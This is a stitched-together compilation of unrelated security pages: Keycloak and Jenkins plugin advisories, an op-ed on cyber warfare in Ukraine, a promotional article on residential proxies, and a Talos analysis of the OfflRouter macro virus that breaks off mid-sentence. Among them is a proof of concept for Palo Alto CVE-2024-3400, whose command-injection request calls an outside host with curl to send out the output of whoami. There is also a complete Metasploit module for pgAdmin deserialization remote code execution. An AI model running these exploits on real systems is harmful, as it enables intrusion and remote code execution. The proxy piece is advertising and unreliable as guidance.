Keycloak does not correctly validate its client step-up authentication. A password-authed attacker could use this flaw to register a false second auth factor, alongside the existing one, to a targeted account. The second factor then permits step-up authentication.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2023-3597

**Keycloak secondary factor bypass in step-up authentication**

Moderate severity GitHub Reviewed Published Apr 17, 2024 in keycloak/keycloak • Updated Apr 17, 2024

**Package**

maven org.keycloak:keycloak-services (Maven)

**Affected versions**

< 22.0.10

\>= 23.0.0, < 24.0.3

**Patched versions**

22.0.10

24.0.3

Keycloak does not correctly validate its client step-up authentication. A password-authed attacker could use this flaw to register a false second auth factor, alongside the existing one, to a targeted account. The second factor then permits step-up authentication.

**References**

*   GHSA-4f53-xh3v-g8x4
*   keycloak/keycloak@aa634ae

Published to the GitHub Advisory Database

Apr 17, 2024

Last updated

Apr 17, 2024

GHSA-4f53-xh3v-g8x4: Keycloak secondary factor bypass in step-up authentication

An issue was found in the redirect_uri validation logic that allows for a bypass of otherwise explicitly allowed hosts.



Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-2419

**Keycloak path traversal vulnerability in the redirect validation**

High severity GitHub Reviewed Published Apr 17, 2024 in keycloak/keycloak • Updated Apr 17, 2024

**Package**

maven org.keycloak:keycloak-services (Maven)

**Affected versions**

< 22.0.10

\>= 23.0.0, < 24.0.3

**Patched versions**

22.0.10

24.0.3

**Description**

Published to the GitHub Advisory Database

Apr 17, 2024

Last updated

Apr 17, 2024

GHSA-mrv8-pqfj-7gp5: Keycloak path traversal vulnerability in the redirect validation

Palo Alto OS was recently hit by a command injection zero day attack. These are exploitation details related to the zero day.

# CVE-2024-3400

CVE-2024-3400 Palo Alto OS Command Injection

send this HTTP request: 

```http

POST /ssl-vpn/hipreport.esp HTTP/1.1  
Host: 127.0.0.1  
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 0  
```

![image](https://github.com/h4x0r-dz/CVE-2024-3400/assets/26070859/96803de5-1d8c-42ec-b1fc-60e8e4a0a954)

you will create hellome1337.txt file on the server with root access 

now if you try to access the files you should receive 403 insted of 404

![image](https://github.com/h4x0r-dz/CVE-2024-3400/assets/26070859/e579d4a6-11a5-4f7c-a3da-ba7b0cfa8a4d)

### Command Injection

```  
POST /ssl-vpn/hipreport.esp HTTP/1.1  
Host: 127.0.01  
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 0

```

More Info :   
https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis  
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/

Palo Alto OS Command Injection

pgAdmin versions 8.3 and below have a path traversal vulnerability within their session management logic that can allow a pickled file to be loaded from an arbitrary location. This can be used to load a malicious, serialized Python object to execute code within the context of the target application. This exploit supports two techniques by which the payload can be loaded, depending on whether or not credentials are specified. If valid credentials are provided, Metasploit will login to pgAdmin and upload a payload object using pgAdmin's file management plugin. Once uploaded, this payload is executed via the path traversal before being deleted using the file management plugin. This technique works for both Linux and Windows targets. If no credentials are provided, Metasploit will start an SMB server and attempt to trigger loading the payload via a UNC path. This technique only works for Windows targets. For Windows 10 v1709 (Redstone 3) and later, it also requires that insecure outbound guest access be enabled. Tested on pgAdmin 8.3 on Linux, 7.7 on Linux, 7.0 on Linux, and 8.3 on Windows. The file management plugin underwent changes in the 6.x versions and therefore, pgAdmin versions below 7.0 cannot utilize the authenticated technique whereby a payload is uploaded.

    # This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-frameworkclass MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::SMB::Server::Share  def initialize(info = {})    super(      update_info(        info,        'Name' => 'pgAdmin Session Deserialization RCE',        'Description' => %q{          pgAdmin versions <= 8.3 have a path traversal vulnerability within their session management logic that can allow          a pickled file to be loaded from an arbitrary location. This can be used to load a malicious, serialized Python          object to execute code within the context of the target application.          This exploit supports two techniques by which the payload can be loaded, depending on whether or not credentials          are specified. If valid credentials are provided, Metasploit will login to pgAdmin and upload a payload object          using pgAdmin's file management plugin. Once uploaded, this payload is executed via the path traversal before          being deleted using the file management plugin. This technique works for both Linux and Windows targets. If no          credentials are provided, Metasploit will start an SMB server and attempt to trigger loading the payload via a          UNC path. This technique only works for Windows targets. For Windows 10 v1709 (Redstone 3) and later, it also          requires that insecure outbound guest access be enabled.          Tested on pgAdmin 8.3 on Linux, 7.7 on Linux, 7.0 on Linux, and 8.3 on Windows. The file management plugin          underwent changes in the 6.x versions and therefor, pgAdmin versions < 7.0 can not utilize the authenticated          technique whereby a payload is uploaded.        },        'Author' => [          'Spencer McIntyre', # metasploit module          'Davide Silvetti', # vulnerability discovery and write up          'Abdel Adim Oisfi' # vulnerability discovery and write up        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-2044'],          ['URL', 'https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/'],          ['URL', 'https://github.com/pgadmin-org/pgadmin4/commit/4e49d752fba72953acceeb7f4aa2e6e32d25853d']        ],        'Stance' => Msf::Exploit::Stance::Aggressive,        'Platform' => 'python',        'Arch' => ARCH_PYTHON,        'Payload' => {},        'Targets' => [          [ 'Automatic', {} ],        ],        'DefaultOptions' => {          'SSL' => true,          'WfsDelay' => 5        },        'DefaultTarget' => 0,        'DisclosureDate' => '2024-03-04', # date it was patched, see: https://github.com/pgadmin-org/pgadmin4/commit/4e49d752fba72953acceeb7f4aa2e6e32d25853d        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'Base path for pgAdmin', '/']),      OptString.new('USERNAME', [false, 'The username to authenticate with (an email address)', '']),      OptString.new('PASSWORD', [false, 'The password to authenticate with', ''])    ])  end  def check    version = get_version    return CheckCode::Unknown('Unable to determine the target version') unless version    return CheckCode::Safe("pgAdmin version #{version} is not affected") if version >= Rex::Version.new('8.4')    CheckCode::Appears("pgAdmin version #{version} is affected")  end  def csrf_token    return @csrf_token if @csrf_token    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)    set_csrf_token_from_login_page(res)    fail_with(Failure::UnexpectedReply, 'Failed to obtain the CSRF token') unless @csrf_token    @csrf_token  end  def set_csrf_token_from_login_page(res)    if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/      @csrf_token = Regexp.last_match(1)    # at some point between v7.0 and 7.7 the token format changed    elsif (element = res.get_html_document.xpath("//input[@id='csrf_token']")&.first)      @csrf_token = element['value']    end  end  def get_version    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)    return unless res&.code == 200    html_document = res.get_html_document    return unless html_document.xpath('//title').text == 'pgAdmin 4'    # there's multiple links in the HTML that expose the version number in the [X]XYYZZ,    # see: https://github.com/pgadmin-org/pgadmin4/blob/053b1e3d693db987d1c947e1cb34daf842e387b7/web/version.py#L27    versioned_link = html_document.xpath('//link').find { |link| link['href'] =~ /\?ver=(\d?\d)(\d\d)(\d\d)/ }    return unless versioned_link    set_csrf_token_from_login_page(res) # store the CSRF token because we have it    Rex::Version.new("#{Regexp.last_match(1).to_i}.#{Regexp.last_match(2).to_i}.#{Regexp.last_match(3).to_i}")  end  def exploit    if datastore['USERNAME'].present?      exploit_upload    else      exploit_remote_load    end  end  def exploit_remote_load    start_service    print_status('The SMB service has been started.')    # Call the exploit primer    self.file_contents = Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, payload.encoded)    trigger_deserialization(unc)  end  def exploit_upload    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'authenticate/login'),      'method' => 'POST',      'keep_cookies' => true,      'vars_post' => {        'csrf_token' => csrf_token,        'email' => datastore['USERNAME'],        'password' => datastore['PASSWORD'],        'language' => 'en',        'internal_button' => 'Login'      }    })    unless res&.code == 302 && res.headers['Location'] != normalize_uri(target_uri.path, 'login')      fail_with(Failure::NoAccess, 'Failed to authenticate to pgAdmin')    end    print_status('Successfully authenticated to pgAdmin')    serialized_data = Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, payload.encoded)    file_name = Faker::File.file_name(dir: '', directory_separator: '')    file_manager_upload(file_name, serialized_data)    trigger_deserialization("../storage/#{datastore['USERNAME'].gsub('@', '_')}/#{file_name}")    file_manager_delete(file_name)  end  def trigger_deserialization(path)    print_status("Triggering deserialization for path: #{path}")    send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'login'),      'cookie' => "pga4_session=#{path}!"    })  end  def file_manager_init    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'file_manager/init'),      'method' => 'POST',      'keep_cookies' => true,      'ctype' => 'application/json',      'headers' => { 'X-pgA-CSRFToken' => csrf_token },      'data' => {        'dialog_type' => 'storage_dialog',        'supported_types' => ['sql', 'csv', 'json', '*'],        'dialog_title' => 'Storage Manager'      }.to_json    })    unless res&.code == 200 && (trans_id = res.get_json_document.dig('data', 'transId'))      fail_with(Failure::UnexpectedReply, 'Failed to initialize a file manager transaction')    end    trans_id  end  def file_manager_delete(file_path)    trans_id = file_manager_init    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, "/file_manager/filemanager/#{trans_id}/"),      'method' => 'POST',      'keep_cookies' => true,      'ctype' => 'application/json',      'headers' => { 'X-pgA-CSRFToken' => csrf_token },      'data' => {        'mode' => 'delete',        'path' => "/#{file_path}",        'storage_folder' => 'my_storage'      }.to_json    })    unless res&.code == 200 && res.get_json_document['success'] == 1      fail_with(Failure::UnexpectedReply, 'Failed to delete file')    end    true  end  def file_manager_upload(file_path, file_contents)    trans_id = file_manager_init    form = Rex::MIME::Message.new    form.add_part(      file_contents,      'application/octet-stream',      'binary',      "form-data; name=\"newfile\"; filename=\"#{file_path}\""    )    form.add_part('add', nil, nil, 'form-data; name="mode"')    form.add_part('/', nil, nil, 'form-data; name="currentpath"')    form.add_part('my_storage', nil, nil, 'form-data; name="storage_folder"')    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, "/file_manager/filemanager/#{trans_id}/"),      'method' => 'POST',      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{form.bound}",      'headers' => { 'X-pgA-CSRFToken' => csrf_token },      'data' => form.to_s    })    unless res&.code == 200 && res.get_json_document['success'] == 1      fail_with(Failure::UnexpectedReply, 'Failed to upload file contents')    end    upload_path = res.get_json_document.dig('data', 'result', 'Name')    print_status("Serialized payload uploaded to: #{upload_path}")    true  endend

pgAdmin 8.3 Remote Code Execution

Versions of the BlazeMeter Jenkins plugin prior to 4.22 contain a flaw which results in credential enumeration.


Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-3825

**BlazeMeter Jenkins plugin vulnerable to Cross-Site Request Forgery**

Moderate severity GitHub Reviewed Published Apr 17, 2024 to the GitHub Advisory Database • Updated Apr 17, 2024

**Package**

maven com.blazemeter.plugins:BlazeMeterJenkinsPlugin (Maven)

**Description**

Published to the GitHub Advisory Database

Apr 17, 2024

Last updated

Apr 17, 2024

GHSA-r52h-fjm7-93j8: BlazeMeter Jenkins plugin vulnerable to Cross-Site Request Forgery

Having a solid disaster recovery plan is the glue that keeps your essential functions together when all hell breaks loose.

Source: Aleksei Gorodenkov via Alamy Stock Photo

COMMENTARY

As the conflict in Ukraine enters its third year, the global community is confronted with the grim reality of modern warfare, where cyber operations have emerged as a pivotal battleground. Reflecting on past events and the ongoing crisis, it's evident that cyberattacks have become a constant threat, leaving no sector untouched and rendering the Ukrainian people and their systems vulnerable to relentless aggression.

In January 2022, as tensions loomed, I was tasked with outlining the potential consequences of a Russian attack on Ukraine to a private equity client with operations in the region. Little did we know that the scenarios we discussed would soon transition from hypothetical to harrowing realities.

Fast forward to 2024, and the dire situation persists. Recent cyberattacks targeting Ukrainian state agencies, including the state-owned energy company, and financial institutions such as Monobank, Ukraine's largest mobile-only bank, underscore the severity of the ongoing digital onslaught. The infiltration of Ukrainian telecommunications giant Kyivstar by Russian hackers further highlights the magnitude of the threat, leaving millions without vital services for days.

**How to Prepare for Cyber Warfare**

Amidst this turmoil, organizations must prioritize disaster recovery preparedness to mitigate risks and enhance resilience. Here are essential steps to consider:

1.  Safety of personnel: Beyond technical aspects, acknowledging the human impact of cyber warfare is paramount. With millions of Ukrainian people displaced and seeking refuge, ensuring the safety and well-being of your teams and their vulnerable families should be a top priority.
    
2.  Comprehensive backup strategies: Implementing robust backup solutions for critical data, systems, and networks is essential to restore operations swiftly in the event of a cyberattack. A multisite strategy ensures data survivability even in the face of unforeseen disasters.
    
3.  Cybersecurity training and awareness: Educating employees about cybersecurity best practices significantly reduces the likelihood of successful attacks, making every individual a frontline defender against cyber threats.
    
4.  Multilayered defense mechanisms: Adopting a multilayered approach to cybersecurity, including firewalls, intrusion detection systems, and endpoint protection, strengthens defenses and minimizes vulnerabilities.
    
5.  Incident response planning: Developing a comprehensive incident response plan enables organizations to react swiftly and effectively to cyber breaches, ensuring minimal disruption and damage.
    
6.  Collaboration and information sharing: Collaborating within the cybersecurity community and sharing threat intelligence and best practices bolsters defenses and adaptability against evolving threats.
    

When I reflect on the pre-war briefing on that cold January day in 2022, I recall how dark and macabre my presentation was. Nobody thought that what I was outlining could become reality. But it did. And even worse.

As we continue to witness the devastating impact of cyber warfare in Ukraine, it serves as a poignant reminder of the imperative for preparedness and resilience in the face of modern threats. By implementing proactive cybersecurity measures, prioritizing human safety, and fostering collaboration, organizations can defend against cyberattacks and uphold principles of sovereignty and stability in the digital age. It is essential for organizations to have a solid disaster recovery plan, as it is the glue that keeps your essential functions together when all hell breaks loose. Together, we can navigate the complexities of cyber warfare and work towards a future where technology protects and empowers all, even amidst conflict and adversity.

**About the Author(s)**

Independent Cybersecurity Consultant

Hadi Shavarini an independent cybersecurity consultant is a seasoned CISSP, with over 20 years of extensive Cloud Security experience across Data, Application, IAM, and Infrastructure domains, along with strategic cybersecurity expertise. As a Cybersecurity Consultant and virtual Chief Information Security Officer (vCISO), he specializes in delivering unparalleled advisory and cybersecurity services fortifying organizations' governance, risk, and compliance strategies. Hadi has demonstrated proficiency in steering cybersecurity initiatives across diverse industries, including financial services, healthcare, energy, manufacturing, tech, and retail. As a vCISO and trusted advisor, he excels in fostering strong client relationships, conducting cybersecurity evaluations, and guiding clients in implementing security frameworks and regulatory compliance. Hadi's leadership extends to his roles as CEO & Cofounder at Blue Robin Inc., and CEO & Cofounder at WebMedicPro. His expertise encompasses a wide range of IT solutions, project management, and strategic consultancy in cybersecurity and technology integration.

Preparing for Cyber Warfare: 6 Key Lessons From Ukraine

By Uzair Amir
Residential proxies bypass geo-restrictions, unlocking global content & websites. Enjoy unrestricted browsing, enhanced privacy, and a world of opportunity for business and personal use. Explore residential proxies today!
This is a post from HackRead.com Read the original post: Access Limitless Global Content: How Residential Proxies Enable It

In a world where Internet and global connectivity is everything, it is essential for access to information and content to be unrestricted by borders. However, geographical limitations frequently restrict individuals’ access to web pages, services, and information based on their location, which frustrates users seeking open access to global content.

One such example is China, where Google and Facebook are still banned in 2024. Nevertheless, residential proxies provide a secure method for users to circumvent these restrictions with ease.

****What Are Residential Proxies?** **

Residential proxies are intermediary servers that give you another IP address assigned by a real Internet Service Provider (ISP) to an actual device. Consequently, when you use a residential proxy server, websites receive your requests as if they come from somewhere else which is in fact the location of the proxy itself anywhere across the globe. This not only helps one avoid geo-restrictions but also boosts privacy and security while online.

****Breaking Down Geo-Restrictions** **

Geo-blocking or geo-restrictions refer to limiting contents’ accessibility using geographical locations of its users by certain companies. This is usually witnessed on streaming platforms, news pieces as well as in retail where products/services vary depending on a user’s location. By hiding your true identity behind one’s own IP address using residential proxies, it enables locational-based contents such as news portals be accessed abroad as if it were local.

****Benefits of Using Residential Proxies for Accessing Global Content****

The benefits of having residential proxies do not just stop at watching shows that are restricted geographically in Netflix or viewing country-specific news websites. Here are some key advantages:

*   **Better Privacy and Anonymity**: Your original IP address gets hidden with residential proxy redirecting your internet connection which protects your identity together with personal data from possible cyber threats.
*   **More Diverse Content Availability**: Whether it is a video-sharing platform, social media network or online library, there might be fewer limitations imposed by residential proxies, thus giving a more varied and richer online experience.

****Choosing the Right Residential Proxy Provider** **

Choosing the most suitable residential proxy provider is crucial to having reliable and effective access to worldwide contents. Consider the following:

*   **Reliability and Speed**: Always find those providers with stable connections and high speeds for smooth browsing as well as streaming.
*   **Range of Locations**: Providers who offer a wide selection of countries/cities can help you globalize your internet experience in essence.
*   **Ethical Considerations**: Prefer providers who acquire IP addresses legally and transparently so as not to come across legal issues.

****Case Studies: Success Stories with Residential Proxies********Expanding Global Research Capabilities****

One market research company based in Canada used residential proxies to gain access to streaming content in more than 30 different countries. This was important for their project on analyzing global trends in streaming service preferences and viewership behaviors. Utilizing residential proxies helped to avoid geo-blocking that would prevent accessing regional-specific content portals by the firm.

As a result, some of their findings contributed to improving the content offerings and promotional strategies for a major streaming service across various markets, leading to increased subscriptions in several key regions.

****Enhancing Real-Time Data Accessibility for Financial Services****

Another example would be of a financial analysis corporation who went for proxies in order to get real-time information regarding stock markets from different parts of the world. They adopted residential proxies so that they could appear like locals in areas where before they had to put up with huge delays and denied access due to being flagged as bots. This made it easier for them to have access to such crucial finance reports like market prices instantly, which enabled them to make better-informed investment decisions and offer improved services for their clients.

****Localized Testing That Enhances E-commerce Strategies****

The reason why an e-commerce platform used residential proxies was because they wanted to test their websites all over the world and optimize them at various locations. The software developers of this website used this kind of proxy so that while designing, it would display the site just like it appears on other people’s computers across the globe.

For instance, malfunctioning currency exchange rates, limited use of languages and specific region user interfaces are some localization problems these staff were able to detect. As a result, there was a remarkable increase in user interaction within previously unproductive markets.

A social media management company relied on residential proxies for managing numerous accounts in different countries without violating any rules or regulations leading to bans or restrictions by social networks. It was especially important considering their regional targeting strategy as well as localized content creation tactics.

Thus, these servers were key in handling customer accounts based in Europe, Asia and the US through customization using content and engagement strategies that reflected culture peculiarities and preferences of each area respectively. Therefore, followership growth rate increased significantly, translating into increased client engagement level.

****Content Compliance and Verification****

In its bid to ensure compliance with various countries’ laws, a media house drew upon residential proxies. By doing this it allowed its compliance division members to be accessing content as viewers from those respective nations making sure that anything that is published meets local requirements set by law firms. This way the company managed to avert possible lawsuits and maintained its reputation as a culturally sensitive and responsible firm.

****Conclusion****

The unlimited advantages of residential proxies are that they provide access to worldwide internet content. They do not only eliminate geographical constraints, but also enhance security and privacy when surfing the net.

Residential proxies are gateways through which you can achieve more openness on the web whenever you need, be it for personal or business needs. Consider leveraging these tools for access to global content.

Through residential proxies, both corporate bodies and individuals can embrace innovation by broadening their horizons, gaining deep insights into everyday operations while at the same time optimizing online experiences.

Whether one is a market researcher or financial analyst, an e-commerce entrepreneur or social media manager or even just a content creator of whatever kind, these techniques provide endless opportunities for accessing international content in today’s digital era.

1.  Tools for Testing Your Proxy Servers
2.  Proxy or VPN for Netflix – Which is Best?
3.  Can You Secure Your Smartphone with a Proxy?
4.  Almost Every Major Free VPN Service is a Glorified Data Farm
5.  What is Dark Web, Search Engines, What Not to Do on Dark Web

Access Limitless Global Content: How Residential Proxies Enable It 

The documents contained malicious VBA code, indicating they may be used as lures to infect organizations.

*   During a threat-hunting exercise, Cisco Talos discovered documents with potentially confidential information originating from Ukraine. The documents contained malicious VBA code, indicating they may be used as lures to infect organizations. 
*   The results of the investigation have shown that the presence of the malicious code is due to the activity of a rare multi-module virus that's delivered via the .NET interop functionality to infect Word documents. 
*   The virus, named OfflRouter, has been active in Ukraine since 2015 and remains active on some Ukrainian organizations’ networks, based on over 100 original infected documents uploaded to VirusTotal from Ukraine and the documents’ upload dates. 
*   We assess that OfflRouter is the work of an inventive but relatively inexperienced developer, based on the unusual choice of the infection mechanism, the apparent lack of testing and mistakes in the code. 
*   The author’s design choices may have limited the spread of the virus to very few organizations while allowing it to remain active and undetected for a long period of time. 

As a part of a regular threat hunting exercise, Cisco Talos monitors files uploaded to open-source repositories for potential lures that may target government and military organizations. Lures are created from legitimate documents by adding content that will trigger malicious behavior and are often used by threat actors. 

For example, malicious document lures with externally referenced templates written in Ukrainian language are used by the Gamaredon group as an initial infection vector. Talos has previously discovered military theme lures in Ukrainian and Polish, mimicking the official PowerPoint and Excel files, to launch the so-called “Picasso loader,” which installs remote access trojans (RATs) onto victims' systems. 

In July 2023, threat actors attempted to use lures related to the NATO summit in Vilnius to install the Romcom remote access trojan. These are just some of the reasons why hunting for document lures is vital to any threat intelligence operation.  

In February 2024, Talos discovered several documents with content that seems to originate from Ukrainian local government organizations and the Ukrainian National Police uploaded to VirusTotal. The documents contained VBA code to drop and run an executable with the name \`ctrlpanel.exe\`, which raised our suspicion and prompted us to investigate further.   

Eventually, we discovered over 100 uploaded documents with potentially confidential information about government and police activities in Ukraine. The analysis of the code showed unexpected results – instead of lures used by advanced actors, the uploaded documents were infected with a multi-component VBA macro virus OfflRouter, created in 2015. The virus is still active in Ukraine and is causing potentially confidential documents to be uploaded to publicly accessible document repositories.   

**Attribution **

Although the virus is active in Ukraine, there are no indications that it was created by an author from that region. Even the debugging database string used to name the virus “E:\\Projects\\OfflRouter2\\OfflRouter2\\obj\\Release\\ctrlpanel.pdb” present in the ctrlpanel.exe does not point to a non-English speaker. 

From the choice of the infection mechanism, VBA code generation, several mistakes in the code, and the apparent lack of testing, we estimate that the author is an inexperienced but inventive programmer.  

The choices made during the development limited the virus to a specific geographic location and allowed it to remain active for almost 10 years. 

**OfflRouter has been confined to Ukraine **

According to earlier research by the Slovakian government CSIRT (Computer Security Incident Response Team) team, some infected documents were already publicly available on the Ukrainian National Police website in 2018.  

The newly discovered infected documents are written in Ukrainian, which may have contributed to the fact that the virus is rarely seen outside Ukraine. Since the malware has no capabilities to spread by email, it can only be spread by sharing documents and removable media, such as USB memory sticks with infected documents. The inability to spread by email and the initial documents in Ukrainian are additional likely reasons the virus stayed confined to Ukraine.  

One of the documents was recently uploaded to VirusTotal from Ukraine. 

The virus targets only documents with the filename extension .doc, the default extension for the OLE2 documents, and it will not try to infect other filename extensions. The default Word document filename extension for the more recent Word versions is .docx, so few documents will be infected as a result.  

This is a possible mistake by the author, although there is a small probability that the malware was specifically created to target a few organizations in Ukraine that still use the .doc extension, even if the documents are internally structured as Office Open XML documents.  

Other issues prevented the virus from spreading more successfully and most of them are found in the executable module, ctrlpanel.exe, dropped and executed by the VBA part of the code.  

When the virus is run, it attempts to set the value Ctrlpanel of the registry key HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run so that it runs on the Windows boot. An internal global string \_RootDir is used as the value, however, the string only contains the folder where the ctrlpanel.exe is found and not its full path, which makes this auto-start measure fail.  

One interesting concept in the .NET module is the entire process of infecting documents. As a part of the infection process, the VBA code is generated by combining the code taken from the hard-coded strings in the module with the encoded bytes of the ctrlpanel.exe binary. This makes the generated code the same for every infection cycle and rather easy to detect. Having a VBA code generator in the .NET code has more potential to make the infected documents more difficult to detect.  

Once launched, the executable module stays active in memory and uses threading timers to execute two background worker objects, the first one tasked with the infection of documents and the second one with checking for the existence of the potential plugin modules for the .NET module.  

The infection background worker enumerates the mounted drives and attempts to find documents to infect by using the Directory.Getfiles function with the string search pattern “\*.doc” as a parameter.  

One of the parameters of the function is the SearchOption parameter which specifies the option to search in subdirectories or only the in the root folder. For fixed drives, the module chooses to search only the root folder, which is an unusual choice, as it is quite unlikely that the root folder will hold any documents to infect.  

For removable drives, the module also searches all subfolders, which likely makes it more successful. Finally, it checks the list of recent documents in Word and attempts to infect them, which contributes to the success of the virus spreading to other documents on fixed drives.  

__The choice of document filename extensions is limited to .doc.__

**OfflRouter VBA code drops and executes the main executable module **

The VBA part of the virus runs when a document is opened, provided macros are enabled, and it contains code to drop and run the executable module ctrlpanel.exe.

__The VBA part creates and executes the executable module of the virus.__

 The beginning of the macro code defines a function that checks if the file already exists and if it does not, it opens it for writing and calls functions CheckHashX, which at first glance looks like containing junk code to reset the value of the variable \`Y\`. However, the variable Y is defined as a private property with an overridden setter function, which converts the variable value assignment into appending the supplied value to the end of the opened executable module C:\\Users\\Public\\ctrlpanel.exe. Every code line that looks like an assignment appends the assigned value to the end of the file, and that is how the executable module is written.  

This technique is likely implemented to make the detection of the embedded module a bit more difficult, as the executable mode is not stored as a contiguous block, but as a sequence of integer values that look like being assigned to a variable.  

To a more experienced analyst, this code looks like garbage code generated by polymorphic engines, and it raises the question of why the author has not extended the code generation to pseudo-randomize the code.  

__Infected Word documents drop the .NET component that infects other documents__. 

The virus is unique, as it consists of VBA and executable modules with the infection logic contained in the PE executable .NET module.  

__The property Y has an overridden setter function to write into a file.__

**Ctrlpanel.exe .NET module **

The unique infection method used by ctrlpanel.exe is through the Office Interop classes of .NET VBProject interface Microsoft.Vbe.Interop and the Microsoft.Office.Interop.Word class that exposes the functionality of the Word application.  

The Interop.Word class is used to instantiate a Document class which allows access to the VBA macro code and the addition of the code to the target document file using the standard Word VBA functions.  

When the .NET module ctrlpanel.exe is launched, it attempts to open a mutex ctrlpanelapppppp to check if another module instance is already running on the system. If the mutex already exists, the process will terminate.  

Suppose no other module instances are running. In that case, ctrlpanel.exe creates the mutex named “ctrlpanelapppppp”, attempts to set the registry run key so the module runs on system startup, and finally initializes two timers to run associated background timer callbacks – VBAClass\_Timer\_Callback and PluginClass\_TimerCallback, implemented to start the Run function of the classes VBAClass and PluginClass, respectively. 

__Ctrlpanel.exe has two threads of execution.__

The VBAClass\_Timer\_Callback will be called one second after the creation of VBAClass\_Timer timer and the PluginClass\_Timer\_Callback three seconds after the creation of the PluginClass\_Timer.  

The full functionality of the executable module is implemented by two classes, VBAClass and PluginClass, specifically within their respective functions Backgroundworker\_DoWork. 

**_VBAClass is tasked with generating VBA code and infecting other Word documents_ **

 The background worker function runs in an infinite loop and contains two major parts, the first is tasked with the document infection and the second with finding the documents to infect, the logic we already described above.  

The infection iterates through a list of the document candidates to infect and uses an innovative method to check the document infection marker to avoid multiple infection processes – the function checks the document creation metadata, adds the creation times, and checks the value of the sum. If the sum is zero, the document is considered already infected.  

__The file system time of creation is used as an infection marker.__

If the document to be infected is created in the Word 97-2003 binary format (OLE2), the document will be saved with the same name in Microsoft Office Open XML format with enabled macros (DOCX).  

The infection uses the traditional VBA class infection routine. It accesses the Visual Basic code module of the first VBComponent and then adds the code generated by the function MyScript to the document’s code module. After that, the infected document is saved.  

__The target document is converted to .docx and then infected.__

The code generation function MyScript contains static strings and instructions to dynamically generate code that will be added to infected documents. It opens its own executable ctrlpanel.exe for reading and reads the file 32-bit by 32-bit value which gets converted to decimal strings that can be saved as VBA code. For every repeating 32-bit value, most commonly for zero, the function creates a for loop to write the repeating value to the dropped file. The purpose is unclear, but it is likely to achieve a small saving in the size of the code and compress it.  

__Repeating 32-bit values are “compressed.”__

For every 4,096 bytes, the code generates a new CheckHashX subroutine to break the code into chunks. The purpose of this is not clear.  

__The VBA code infecting files is dynamically created.__

 After the file is infected, the background worker adds the infection marker file by setting the values of hour, minute, second, and millisecond creation times to zero.

__The infection market is set after the infected file has been copied to its original location.__

**_PluginClass is tasked with discovering and loading plugins_ **

Ctrlpanel.exe can also search for potential plugins present on removable media, which is very unusual for simple viruses that infect documents. This may indicate that the author’s aims were a bit more ambitious than the simple VBA infection. 

Searching for the plugins in removable drives is unusual as it requires the plugins to be delivered to the system on a physical media, such as a USB drive or a CD-ROM. The plugin loader searches for any files with the filename extension .orp, decodes its name using Base64 decoding function, decodes the file content using Base64 decoding, copies the file into the c:\\users\\public\\tools folder with the previously decoded name and the extension .exe and finally executes the plugin. 

__Any plugins found on a removable drive are decoded, copied to drive C: and launched.__

If the plugins are already present on an infected machine, ctrlpanel.exe will try to encode them using Base64 encoding, copy them to the root of the attached removable media with the filename extension “.orp” and set the newly created file attributes to the values system and hidden so that they are not displayed by default by Windows File Explorer. 

**It is unclear if the initial vector is a document or the executable module ctrlpanel.exe **

The advantage of the two-module virus is that it can be spread as a standalone executable or as an infected document. It may even be advantageous to initially spread as an executable as the module can run standalone and set the registry keys to allow execution of the VBA code and changing of the default saved file formats to doc before infecting documents. That way, the infection may be a bit stealthier.  

The following registry keys are set: 
